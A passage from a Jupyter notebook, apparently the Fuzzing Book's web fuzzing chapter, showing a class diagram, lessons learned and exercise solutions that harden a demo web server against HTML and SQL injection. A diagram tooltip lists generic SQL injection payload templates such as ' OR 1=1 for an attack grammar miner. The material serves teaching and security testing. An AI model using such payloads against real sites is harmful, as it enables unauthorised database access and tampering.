       "<g id=\"a_node5_18\"><a xlink:href=\"#\" xlink:title=\"run(self, url: str) &#45;&gt; Tuple[str, str]:&#10;Run the runner with the given input\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-12.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">run()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- Runner -->\n",
       "<g id=\"node6\" class=\"node\">\n",
       "<title>Runner</title>\n",
       "<g id=\"a_node6\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"class Runner:&#10;Base class for testing inputs.\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"159.25,-105 159.25,-210.75 235.25,-210.75 235.25,-105 159.25,-105\"/>\n",
       "<text text-anchor=\"start\" x=\"174.38\" y=\"-194.45\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">Runner</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"159.25,-184.75 235.25,-184.75\"/>\n",
       "<g id=\"a_node6_19\"><a xlink:href=\"#\" xlink:title=\"Runner\">\n",
       "<g id=\"a_node6_20\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"FAIL = &#39;FAIL&#39;\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-171.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">FAIL</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node6_21\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"PASS = &#39;PASS&#39;\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-158.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">PASS</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node6_22\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"UNRESOLVED = &#39;UNRESOLVED&#39;\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-145.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">UNRESOLVED</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"159.25,-138.5 235.25,-138.5\"/>\n",
       "<g id=\"a_node6_23\"><a xlink:href=\"#\" xlink:title=\"Runner\">\n",
       "<g id=\"a_node6_24\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"__init__(self) &#45;&gt; None:&#10;Initialize\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-126\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node6_25\"><a xlink:href=\"Fuzzer.ipynb\" xlink:title=\"run(self, inp: str) &#45;&gt; Any:&#10;Run the runner with the given input\">\n",
       "<text text-anchor=\"start\" x=\"167.25\" y=\"-113.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">run()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- WebRunner&#45;&gt;Runner -->\n",
       "<g id=\"edge4\" class=\"edge\">\n",
       "<title>WebRunner&#45;&gt;Runner</title>\n",
       "<path fill=\"none\" stroke=\"black\" d=\"M197.25,-64.38C197.25,-73.16 197.25,-83.17 197.25,-93.28\"/>\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"193.75,-93.16 197.25,-103.16 200.75,-93.16 193.75,-93.16\"/>\n",
       "</g>\n",
       "<!-- HTMLGrammarMiner -->\n",
       "<g id=\"node7\" class=\"node\">\n",
       "<title>HTMLGrammarMiner</title>\n",
       "<g id=\"a_node7\"><a xlink:href=\"#\" xlink:title=\"class HTMLGrammarMiner:&#10;Mine a grammar from a HTML form\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"279.88,-117.75 279.88,-198 428.62,-198 428.62,-117.75 279.88,-117.75\"/>\n",
       "<text text-anchor=\"start\" x=\"287.88\" y=\"-181.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">HTMLGrammarMiner</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"279.88,-172 428.62,-172\"/>\n",
       "<g id=\"a_node7_26\"><a xlink:href=\"#\" xlink:title=\"HTMLGrammarMiner\">\n",
       "<g id=\"a_node7_27\"><a xlink:href=\"#\" xlink:title=\"QUERY_GRAMMAR = {&#39;&lt;start&gt;&#39;: [&#39;&lt;action&gt;?&lt;query&gt;&#39;], &#39;&lt;string&gt;&#39;: [&#39;&lt;letter&gt;&#39;, &#39;&lt;letter&gt;&lt;string&gt;&#39;], &#39;&lt;letter&gt;&#39;: [&#39;&lt;plus&gt;&#39;, &#39;&lt;percent&gt;&#39;, &#39;&lt;other&gt;&#39;], &#39;&lt;plus&gt;&#39;: [&#39;+&#39;], &#39;&lt;percent&gt;&#39;: [&#39;%&lt;hexdigit&#45;1&gt;&lt;hexdigit&gt;&#39;], &#39;&lt;hexdigit&gt;&#39;: [&#39;0&#39;, &#39;1&#39;, &#39;2&#39;, &#39;3&#39;, &#39;4&#39;, &#39;5&#39;, &#39;6&#39;, &#39;7&#39;, &#39;8&#39;, &#39;9&#39;, &#39;a&#39;, &#39;b&#39;, &#39;c&#39;, &#39;d&#39;, &#39;e&#39;, &#39;f&#39;], &#39;&lt;other&gt;&#39;: [&#39;0&#39;, &#39;1&#39;, &#39;2&#39;, &#39;3&#39;, &#39;4&#39;, &#39;5&#39;, &#39;a&#39;, &#39;b&#39;, &#39;c&#39;, &#39;d&#39;, &#39;e&#39;, &#39;&#45;&#39;, &#39;_&#39;], &#39;&lt;text&gt;&#39;: [&#39;&lt;string&gt;&#39;], &#39;&lt;number&gt;&#39;: [&#39;&lt;digits&gt;&#39;], &#39;&lt;digits&gt;&#39;: [&#39;&lt;digit&gt;&#39;, &#39;&lt;digits&gt;&lt;digit&gt;&#39;], &#39;&lt;digit&gt;&#39;: [&#39;0&#39;, &#39;1&#39;, &#39;2&#39;, &#39;3&#39;, &#39;4&#39;, &#39;5&#39;, &#39;6&#39;, &#39;7&#39;, &#39;8&#39;, &#39;9&#39;], &#39;&lt;checkbox&gt;&#39;: [&#39;&lt;_checkbox&gt;&#39;], &#39;&lt;_checkbox&gt;&#39;: [&#39;on&#39;, &#39;off&#39;], &#39;&lt;email&gt;&#39;: [&#39;&lt;_email&gt;&#39;], &#39;&lt;_email&gt;&#39;: [&#39;&lt;string&gt;%40&lt;string&gt;&#39;], &#39;&lt;password&gt;&#39;: [&#39;&lt;_password&gt;&#39;], &#39;&lt;_password&gt;&#39;: [&#39;abcABC.123&#39;], &#39;&lt;hexdigit&#45;1&gt;&#39;: [&#39;3&#39;, &#39;4&#39;, &#39;5&#39;, &#39;6&#39;, &#39;7&#39;], &#39;&lt;submit&gt;&#39;: [&#39;&#39;]}\">\n",
       "<text text-anchor=\"start\" x=\"315.25\" y=\"-158.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">QUERY_GRAMMAR</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"279.88,-151.25 428.62,-151.25\"/>\n",
       "<g id=\"a_node7_28\"><a xlink:href=\"#\" xlink:title=\"HTMLGrammarMiner\">\n",
       "<g id=\"a_node7_29\"><a xlink:href=\"#\" xlink:title=\"__init__(self, html_text: str) &#45;&gt; None:&#10;Constructor. `html_text` is the HTML string to parse.\">\n",
       "<text text-anchor=\"start\" x=\"312.25\" y=\"-138.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "<g id=\"a_node7_30\"><a xlink:href=\"#\" xlink:title=\"mine_grammar(self) &#45;&gt; Dict[str, List[Expansion]]:&#10;Extract a grammar from the given HTML text\">\n",
       "<text text-anchor=\"start\" x=\"312.25\" y=\"-125\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">mine_grammar()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- SQLInjectionGrammarMiner -->\n",
       "<g id=\"node8\" class=\"node\">\n",
       "<title>SQLInjectionGrammarMiner</title>\n",
       "<g id=\"a_node8\"><a xlink:href=\"#\" xlink:title=\"class SQLInjectionGrammarMiner:&#10;Demonstration of an automatic SQL Injection attack grammar miner\">\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"260,-0.5 260,-68 448.5,-68 448.5,-0.5 260,-0.5\"/>\n",
       "<text text-anchor=\"start\" x=\"268\" y=\"-51.7\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"14.00\" fill=\"#b03a2e\">SQLInjectionGrammarMiner</text>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"260,-42 448.5,-42\"/>\n",
       "<g id=\"a_node8_31\"><a xlink:href=\"#\" xlink:title=\"SQLInjectionGrammarMiner\">\n",
       "<g id=\"a_node8_32\"><a xlink:href=\"#\" xlink:title=\"ATTACKS = [&quot;&lt;string&gt;&#39; &lt;sql&#45;values&gt;); &lt;sql&#45;payload&gt;; &lt;sql&#45;comment&gt;&quot;, &quot;&lt;string&gt;&#39; &lt;sql&#45;comment&gt;&quot;, &quot;&#39; OR 1=1&lt;sql&#45;comment&gt;&#39;&quot;, &#39;&lt;number&gt; OR 1=1&#39;]\">\n",
       "<text text-anchor=\"start\" x=\"333.25\" y=\"-28.5\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"10.00\">ATTACKS</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "<polyline fill=\"none\" stroke=\"black\" points=\"260,-21.25 448.5,-21.25\"/>\n",
       "<g id=\"a_node8_33\"><a xlink:href=\"#\" xlink:title=\"SQLInjectionGrammarMiner\">\n",
       "<g id=\"a_node8_34\"><a xlink:href=\"#\" xlink:title=\"__init__(self, html_text: str, sql_payload: str):&#10;Constructor.&#10;`html_text` &#45; the HTML form to be attacked&#10;`sql_payload` &#45; the SQL command to be executed\">\n",
       "<text text-anchor=\"start\" x=\"324.25\" y=\"-8.75\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-style=\"italic\" font-size=\"10.00\">__init__()</text>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</a>\n",
       "</g>\n",
       "</g>\n",
       "<!-- SQLInjectionGrammarMiner&#45;&gt;HTMLGrammarMiner -->\n",
       "<g id=\"edge5\" class=\"edge\">\n",
       "<title>SQLInjectionGrammarMiner&#45;&gt;HTMLGrammarMiner</title>\n",
       "<path fill=\"none\" stroke=\"black\" d=\"M354.25,-68.48C354.25,-80.12 354.25,-93.46 354.25,-106.19\"/>\n",
       "<polygon fill=\"none\" stroke=\"black\" points=\"350.75,-106.13 354.25,-116.13 357.75,-106.13 350.75,-106.13\"/>\n",
       "</g>\n",
       "<!-- Legend -->\n",
       "<g id=\"node9\" class=\"node\">\n",
       "<title>Legend</title>\n",
       "<text text-anchor=\"start\" x=\"466.62\" y=\"-50.25\" font-family=\"Patua One, Helvetica, sans-serif\" font-weight=\"bold\" font-size=\"10.00\" fill=\"#b03a2e\">Legend</text>\n",
       "<text text-anchor=\"start\" x=\"466.62\" y=\"-40.25\" font-family=\"Patua One, Helvetica, sans-serif\" font-size=\"10.00\">• </text>\n",
       "<text text-anchor=\"start\" x=\"472.62\" y=\"-40.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-weight=\"bold\" font-size=\"8.00\">public_method()</text>\n",
       "<text text-anchor=\"start\" x=\"466.62\" y=\"-30.25\" font-family=\"Patua One, Helvetica, sans-serif\" font-size=\"10.00\">• </text>\n",
       "<text text-anchor=\"start\" x=\"472.62\" y=\"-30.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-size=\"8.00\">private_method()</text>\n",
       "<text text-anchor=\"start\" x=\"466.62\" y=\"-20.25\" font-family=\"Patua One, Helvetica, sans-serif\" font-size=\"10.00\">• </text>\n",
       "<text text-anchor=\"start\" x=\"472.62\" y=\"-20.25\" font-family=\"'Fira Mono', 'Source Code Pro', 'Courier', monospace\" font-style=\"italic\" font-size=\"8.00\">overloaded_method()</text>\n",
       "<text text-anchor=\"start\" x=\"466.62\" y=\"-11.2\" font-family=\"Helvetica,sans-Serif\" font-size=\"9.00\">Hover over names to see doc</text>\n",
       "</g>\n",
       "</g>\n",
       "</svg>\n"
      ],
      "text/plain": [
       "<graphviz.graphs.Digraph at 0x11f736ea0>"
      ]
     },
     "execution_count": 173,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "# ignore\n",
    "display_class_hierarchy([WebFormFuzzer, SQLInjectionFuzzer, WebRunner,\n",
    "                         HTMLGrammarMiner, SQLInjectionGrammarMiner],\n",
    "                        public_methods=[\n",
    "                            Fuzzer.__init__,\n",
    "                            Fuzzer.fuzz,\n",
    "                            Fuzzer.run,\n",
    "                            Fuzzer.runs,\n",
    "                            Runner.__init__,\n",
    "                            Runner.run,\n",
    "                            WebRunner.__init__,\n",
    "                            WebRunner.run,\n",
    "                            GrammarFuzzer.__init__,\n",
    "                            GrammarFuzzer.fuzz,\n",
    "                            GrammarFuzzer.fuzz_tree,\n",
    "                            WebFormFuzzer.__init__,\n",
    "                            SQLInjectionFuzzer.__init__,\n",
    "                            HTMLGrammarMiner.__init__,\n",
    "                            SQLInjectionGrammarMiner.__init__,\n",
    "                        ],\n",
    "                        types={\n",
    "                            'DerivationTree': DerivationTree,\n",
    "                            'Expansion': Expansion,\n",
    "                            'Grammar': Grammar\n",
    "                        },\n",
    "                        project='fuzzingbook')"
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": true,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "slide"
    }
   },
   "source": [
    "## Lessons Learned\n",
    "\n",
    "* User Interfaces (on the Web and elsewhere) should be tested with _expected_ and _unexpected_ values.\n",
    "* One can _mine grammars from user interfaces_, allowing for their widespread testing.\n",
    "* Consequent _sanitizing_ of inputs prevents common attacks such as code and SQL injection.\n",
    "* Do not attempt to write a Web server yourself, as you are likely to repeat all the mistakes of others."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "source": [
    "We're done, so we can clean up:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 174,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.096602Z",
     "iopub.status.busy": "2025-01-16T10:12:28.096461Z",
     "iopub.status.idle": "2025-01-16T10:12:28.101827Z",
     "shell.execute_reply": "2025-01-16T10:12:28.101584Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "clear_httpd_messages()"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 175,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.103290Z",
     "iopub.status.busy": "2025-01-16T10:12:28.103207Z",
     "iopub.status.idle": "2025-01-16T10:12:28.104921Z",
     "shell.execute_reply": "2025-01-16T10:12:28.104669Z"
    },
    "slideshow": {
     "slide_type": "fragment"
    }
   },
   "outputs": [],
   "source": [
    "httpd_process.terminate()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "slide"
    }
   },
   "source": [
    "## Next Steps\n",
    "\n",
    "From here, the next step is [GUI Fuzzing](GUIFuzzer.ipynb), going from HTML- and Web-based user interfaces to generic user interfaces (including JavaScript and mobile user interfaces).\n",
    "\n",
    "If you are interested in security testing, do not miss our [chapter on information flow](InformationFlow.ipynb), showing how to systematically detect information leaks; this also addresses the issue of SQL Injection attacks."
   ]
  },
  {
   "attachments": {},
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "slide"
    }
   },
   "source": [
    "## Background\n",
    "\n",
    "The [Wikipedia pages on Web application security](https://en.wikipedia.org/wiki/Web_application_security) are a mandatory read for anyone building, maintaining, or testing Web applications.  In 2012, cross-site scripting and SQL injection, as discussed in this chapter, made up more than 50% of Web application vulnerabilities.\n",
    "\n",
    "The [Wikipedia page on penetration testing](https://en.wikipedia.org/wiki/Penetration_test) provides a comprehensive overview on the history of penetration testing, as well as collections of vulnerabilities.\n",
    "\n",
    "The [OWASP Zed Attack Proxy Project](https://www.owasp.org/index.php/OWASP_Zed_Attack_Proxy_Project) (ZAP) is an open source website security scanner including several of the features discussed above, and many many more."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": true,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "slide"
    }
   },
   "source": [
    "## Exercises"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "### Exercise 1: Fix the Server\n",
    "\n",
    "Create a `BetterHTTPRequestHandler` class that fixes the several issues of `SimpleHTTPRequestHandler`:"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    },
    "solution2": "hidden",
    "solution2_first": true
   },
   "source": [
    "#### Part 1: Silent Failures\n",
    "\n",
    "Set up the server such that it does not reveal internal information – in particular, tracebacks and HTTP status codes."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "**Solution.** We define a better message that does not reveal tracebacks:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 176,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.106501Z",
     "iopub.status.busy": "2025-01-16T10:12:28.106419Z",
     "iopub.status.idle": "2025-01-16T10:12:28.108245Z",
     "shell.execute_reply": "2025-01-16T10:12:28.108018Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "BETTER_HTML_INTERNAL_SERVER_ERROR = \\\n",
    "    HTML_INTERNAL_SERVER_ERROR.replace(\"<pre>{error_message}</pre>\", \"\")"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 177,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.109712Z",
     "iopub.status.busy": "2025-01-16T10:12:28.109619Z",
     "iopub.status.idle": "2025-01-16T10:12:28.111726Z",
     "shell.execute_reply": "2025-01-16T10:12:28.111514Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "\n",
       "<html><body>\n",
       "<div style=\"border:3px; border-style:solid; border-color:#FF0000; padding: 1em;\">\n",
       "  <strong id=\"title\" style=\"font-size: x-large\">Internal Server Error</strong>\n",
       "  <p>\n",
       "  The server has encountered an internal error.  Go to our <a href=\"/\">order form</a>.\n",
       "  \n",
       "  </p>\n",
       "</div>\n",
       "</body></html>\n",
       "  "
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "execution_count": 177,
     "metadata": {},
     "output_type": "execute_result"
    }
   ],
   "source": [
    "HTML(BETTER_HTML_INTERNAL_SERVER_ERROR)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "We have the `internal_server_error()` message return `HTTPStatus.OK` to make it harder for machines to find out something went wrong:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 178,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.113286Z",
     "iopub.status.busy": "2025-01-16T10:12:28.113193Z",
     "iopub.status.idle": "2025-01-16T10:12:28.115518Z",
     "shell.execute_reply": "2025-01-16T10:12:28.115288Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "class BetterHTTPRequestHandler(SimpleHTTPRequestHandler):\n",
    "    def internal_server_error(self):\n",
    "        # Note: No INTERNAL_SERVER_ERROR status\n",
    "        self.send_response(HTTPStatus.OK, \"Internal Error\")\n",
    "\n",
    "        self.send_header(\"Content-type\", \"text/html\")\n",
    "        self.end_headers()\n",
    "\n",
    "        exc = traceback.format_exc()\n",
    "        self.log_message(\"%s\", exc.strip())\n",
    "\n",
    "        # No traceback or other information\n",
    "        message = BETTER_HTML_INTERNAL_SERVER_ERROR\n",
    "        self.wfile.write(message.encode(\"utf8\"))"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    }
   },
   "source": [
    "#### Part 2: Sanitized HTML\n",
    "\n",
    "Set up the server such that it is not vulnerable against HTML and JavaScript injection attacks, notably by using methods such as `html.escape()` to escape special characters when showing them."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 179,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.116958Z",
     "iopub.status.busy": "2025-01-16T10:12:28.116880Z",
     "iopub.status.idle": "2025-01-16T10:12:28.118393Z",
     "shell.execute_reply": "2025-01-16T10:12:28.118178Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden",
    "solution2_first": true
   },
   "outputs": [],
   "source": [
    "import html"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "**Solution.** We pass all values read through `html.escape()` before showing them on the screen; this will properly encode `<`, `&`, and `>` characters."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 180,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.119836Z",
     "iopub.status.busy": "2025-01-16T10:12:28.119754Z",
     "iopub.status.idle": "2025-01-16T10:12:28.122013Z",
     "shell.execute_reply": "2025-01-16T10:12:28.121804Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "class BetterHTTPRequestHandler(BetterHTTPRequestHandler):\n",
    "    def send_order_received(self, values):\n",
    "        sanitized_values = {}\n",
    "        for field in values:\n",
    "            sanitized_values[field] = html.escape(values[field])\n",
    "        sanitized_values[\"item_name\"] = html.escape(\n",
    "            FUZZINGBOOK_SWAG[values[\"item\"]])\n",
    "\n",
    "        confirmation = HTML_ORDER_RECEIVED.format(\n",
    "            **sanitized_values).encode(\"utf8\")\n",
    "\n",
    "        self.send_response(HTTPStatus.OK, \"Order received\")\n",
    "        self.send_header(\"Content-type\", \"text/html\")\n",
    "        self.end_headers()\n",
    "        self.wfile.write(confirmation)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    },
    "solution2": "hidden",
    "solution2_first": true
   },
   "source": [
    "#### Part 3: Sanitized SQL\n",
    "\n",
    "Set up the server such that it is not vulnerable against SQL injection attacks, notably by using _SQL parameter substitution._"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "**Solution.** We use SQL parameter substitution to avoid interpretation of inputs as SQL commands.  Also, we use `execute()` rather than `executescript()` to avoid processing of multiple commands."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 181,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.123418Z",
     "iopub.status.busy": "2025-01-16T10:12:28.123342Z",
     "iopub.status.idle": "2025-01-16T10:12:28.125349Z",
     "shell.execute_reply": "2025-01-16T10:12:28.125138Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "class BetterHTTPRequestHandler(BetterHTTPRequestHandler):\n",
    "    def store_order(self, values):\n",
    "        db = sqlite3.connect(ORDERS_DB)\n",
    "        db.execute(\"INSERT INTO orders VALUES (?, ?, ?, ?, ?)\",\n",
    "                (values['item'], values['name'], values['email'], values['city'], values['zip']))\n",
    "        db.commit()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "One could also argue not to save \"dangerous\" characters in the first place.  But then, there might always be names or addresses with special characters which all need to be handled."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    },
    "solution2": "hidden",
    "solution2_first": true
   },
   "source": [
    "#### Part 4: A Robust Server\n",
    "\n",
    "Set up the server such that it does not crash with invalid or missing fields."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "**Solution.** We set up a simple check at the beginning of `handle_order()` that checks whether all required fields are present.  If not, we return to the order form."
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 182,
   "metadata": {
    "cell_style": "split",
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.126844Z",
     "iopub.status.busy": "2025-01-16T10:12:28.126769Z",
     "iopub.status.idle": "2025-01-16T10:12:28.128804Z",
     "shell.execute_reply": "2025-01-16T10:12:28.128579Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "class BetterHTTPRequestHandler(BetterHTTPRequestHandler):\n",
    "    REQUIRED_FIELDS = ['item', 'name', 'email', 'city', 'zip']\n",
    "\n",
    "    def handle_order(self):\n",
    "        values = self.get_field_values()\n",
    "        for required_field in self.REQUIRED_FIELDS:\n",
    "            if required_field not in values:\n",
    "                self.send_order_form()\n",
    "                return\n",
    "\n",
    "        self.store_order(values)\n",
    "        self.send_order_received(values)"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "This could easily be extended to check for valid (at least non-empty) values.  Also, the order form should be pre-filled with the originally submitted values, and come with a helpful error message."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "button": false,
    "new_sheet": false,
    "run_control": {
     "read_only": false
    },
    "slideshow": {
     "slide_type": "subslide"
    },
    "solution2": "hidden",
    "solution2_first": true
   },
   "source": [
    "#### Part 5: Test it!\n",
    "\n",
    "Test your improved server whether your measures have been successful."
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "**Solution.**  Here we go:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 183,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.130309Z",
     "iopub.status.busy": "2025-01-16T10:12:28.130231Z",
     "iopub.status.idle": "2025-01-16T10:12:28.140696Z",
     "shell.execute_reply": "2025-01-16T10:12:28.140182Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "httpd_process, httpd_url = start_httpd(BetterHTTPRequestHandler)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 184,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.142699Z",
     "iopub.status.busy": "2025-01-16T10:12:28.142548Z",
     "iopub.status.idle": "2025-01-16T10:12:28.145474Z",
     "shell.execute_reply": "2025-01-16T10:12:28.145240Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [
    {
     "data": {
      "text/html": [
       "<pre><a href=\"http://127.0.0.1:8800\">http://127.0.0.1:8800</a></pre>"
      ],
      "text/plain": [
       "<IPython.core.display.HTML object>"
      ]
     },
     "metadata": {},
     "output_type": "display_data"
    }
   ],
   "source": [
    "print_url(httpd_url)"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 185,
   "metadata": {
    "execution": {
     "iopub.execute_input": "2025-01-16T10:12:28.146956Z",
     "iopub.status.busy": "2025-01-16T10:12:28.146856Z",
     "iopub.status.idle": "2025-01-16T10:12:28.148382Z",
     "shell.execute_reply": "2025-01-16T10:12:28.148156Z"
    },
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "outputs": [],
   "source": [
    "print_httpd_messages()"
   ]
  },
  {
   "cell_type": "markdown",
   "metadata": {
    "slideshow": {
     "slide_type": "skip"
    },
    "solution2": "hidden"
   },
   "source": [
    "We test standard behavior:"
   ]
  },
  {
   "cell_type": "code",
   "execution_count": 186,
   "metadata": {
    "execution": {
